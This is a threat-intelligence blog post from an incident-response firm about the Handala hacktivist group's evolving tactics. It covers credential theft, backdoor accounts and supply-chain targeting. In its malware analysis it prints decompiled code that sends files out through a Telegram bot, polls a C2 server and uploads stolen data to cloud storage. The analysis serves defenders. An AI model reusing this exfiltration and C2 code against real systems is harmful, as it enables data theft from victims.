For over a year, Handala has been relentlessly targeting the Israeli sector, evolving from a disruptive nuisance to a formidable cyber threat. What started as unsophisticated phishing campaigns and DDoS attacks has now escalated into a full-fledged offensive against critical infrastructure. But what exactly changed?
In this first-of-its-kind research, we reveal how Handala has transformed from a hacktivist group into an aspiring nation-state-level adversary, leveraging advanced tactics, stolen credentials, and covert data exfiltration techniques. With the help of our in-house AI-powered analysis tools, we dissect their malware, uncover hidden operational patterns, and reverse-engineer their attack framework.
For the first time, we reveal their evolving tactics, the technologies fueling their operations, and their methods for siphoning sensitive data to cloud storage and Telegram.
This isn’t just another cyber threat-it’s a turning point.
And trust us, there’s a lot to unpack…
Why OP Innovate Conducted This Research
At OP Innovate, we pride ourselves on delivering top-tier incident response (IR) services, and over the past several months, we’ve been on the front lines of multiple Handala-related investigations. Time and time again, we’ve seen the same pattern-organizations blindsided by an attacker that was evolving faster than most defenders could react.
Through these real-world incidents, we uncovered a wealth of Indicators of Compromise (IOCs)-intel that wasn’t publicly available anywhere else. And that’s when the idea struck: What if we took the time to dig deeper? By reverse-engineering the traces Handala left behind and following the breadcrumbs, we could piece together their evolving playbook. More importantly, we can use these insights to arm future victims with the knowledge to detect, disrupt, and defend against these attacks before their data is compromised.
This research isn’t just about understanding Handala-it’s about staying one step ahead.
Handala 2.0: From Keyboard Warriors to Cyber Militants
Over the past six months, Handala has evolved from a disruptive hacktivist collective into a structured cyber threat actor, adopting nation-state-level tactics and expanding its target selection from random disruptions to calculated attacks on critical infrastructure. This transition reflects a shift from cyber vandalism to organized cyber warfare, with a growing focus on stealth, persistence, and large-scale data exfiltration.
Tactics: From Defacements to Strategic Infiltration
- Credential-Based Attacks:
Handala has moved away from simplistic DDoS attacks and defacements, instead exploiting stolen credentials from dark web marketplaces. By targeting organizations that do not enforce multi-factor authentication (MFA), they gain stealthy, long-term access without triggering security alerts. - Privilege Escalation & Backdoors:
Once inside a network, Handala rapidly escalates privileges, often creating backdoor accounts to maintain access even if the initial entry point is patched. This persistence allows them to return to compromised networks at will. - Cloud-Based Exfiltration:
Rather than relying on direct data transfers, Handala stores exfiltrated data in legitimate cloud services like Storj and Vultr, making their operations harder to detect and disrupt. - Multi-Channel C2 & Evasion Techniques:
Handala’s malware blends into normal network traffic by communicating over Telegram’s encrypted API, HTTP-based C2 servers, and cloud APIs, making detection challenging.
Target Selection: From Random Disruptions to High-Value Supply Chain Attacks
- Early Targets:
- Small businesses and media outlets.
- Public-facing websites, often attacked for maximum visibility rather than operational impact.
- Recent Targets:
- Supply Chain Vendors – Instead of attacking individual organizations directly, Handala breaches IT and cloud service providers to gain access to multiple downstream victims.
- Critical Infrastructure – The group has increasingly targeted companies providing essential services, with a focus on IT management, cloud services, and engineering firms.
Some of their most recent confirmed breaches include:
- ReutOne (CRM Provider) – This breach also allowed indirect access to Allen Carr’s Easyway, a well-known addiction treatment institution.
- Zuk Group (Construction & Engineering Firm) – A multinational financial and technology conglomerate.
These attacks indicate a deliberate shift towards infiltrating service providers-a hallmark of sophisticated, long-term cyber campaigns aimed at gaining access to entire industries rather than single entities.
Unpacking Handala: Tracing the Trail of Stolen Data
Using forensic evidence from multiple breach sites, we conducted a deep dive into Handala’s malware infrastructure, exfiltration techniques, and operational persistence mechanisms. Our findings confirm that Handala is not just breaching networks but systematically organizing and distributing stolen intelligence to secure locations.
Phase 1: Extracting and Analyzing the Malware
1. Cracking Open senvarservice-DC.exe
One of the first major discoveries in our investigation was a Windows executable (senvarservice-DC.exe), which turned out to be a PyInstaller-packed Python script masquerading as a legitimate application.
By unpacking the executable, we found:
- Amazon botocore references, suggesting AWS S3 was being used for data exfiltration.
- PyQt5 dependencies, indicating a GUI component that could be used for disguise.
2. Automating Reverse Engineering with LISA
Using LISA (Layered Inspection & Structural Analysis)-our AI-powered reverse engineering tool – we were able to:
- Disassemble the binary and extract its structure.
- Decompile the Python code hidden within.
- Detect Indicators of Compromise (IOCs).
With LISA, we accelerated the unpacking process, allowing us to focus on analyzing Handala’s malware behavior rather than just its packaging.
Phase 2: Breaking Down the Code
Once the internal Python scripts were extracted, we needed to decompile them. However, the malware was written in Python 3.12, making traditional decompilers like uncompyle6 and pycdc ineffective.
Automating the Decompilation Process
To handle this, we built a custom automation script that:
- Uploaded .pyc files to Pylingual.io for decompilation.
- Fetched results and saved readable Python scripts.
- Allowed bulk processing, significantly reducing manual workload.
Once the code was fully decompiled, we moved to Phase 3: Understanding Handala’s Attack Framework.
Phase 3: Understanding Handala’s Cyber Toolkit
1. Telegram API for Data Exfiltration
The malware automates data exfiltration via Telegram bots, making it harder to detect.
def send_document(bot_token, chat_id, file_path):
url = f"https://api.telegram.org/bot{bot_token}/sendDocument"
files = {"document": open(file_path, 'rb')}
payload = {"chat_id": chat_id}
response = requests.post(url, files=files, data=payload)
return response.status_code
The malware periodically checks its hardcoded HTTP C2 server for commands.
def fetch_c2_command():
try:
response = requests.get(f"{server_url}/command")
if response.status_code == 200:
return response.json()
except Exception as e:
log_error(f"Error fetching commands: {str(e)}")
return None
3. Cloud-Based Storage for Stolen Data
The malware uploads stolen files to Storj cloud storage for long-term retention.
def upload_to_s3(file_path):
session = boto3.Session(aws_access_key_id=S3_access_key, aws_secret_access_key=S3_secret_key)
s3 = session.resource('s3')
bucket = s3.Bucket('handala-bucket')
bucket.upload_file(file_path, os.path.basename(file_path))
Final Observations: The Future of Handala’s Cyber Operations
- Stealth & Persistence: Handala’s use of multi-channel exfiltration and modular malware design allows for long-term infiltration.
- Adaptive Strategy: Attackers can switch C2 infrastructure, encryption methods, and targets in real-time.
- Supply Chain Targeting: By compromising IT vendors, Handala can expand its reach beyond a single victim.
Understanding these tactics is critical for cybersecurity teams, as Handala continues to refine its strategy against high-value organizations.
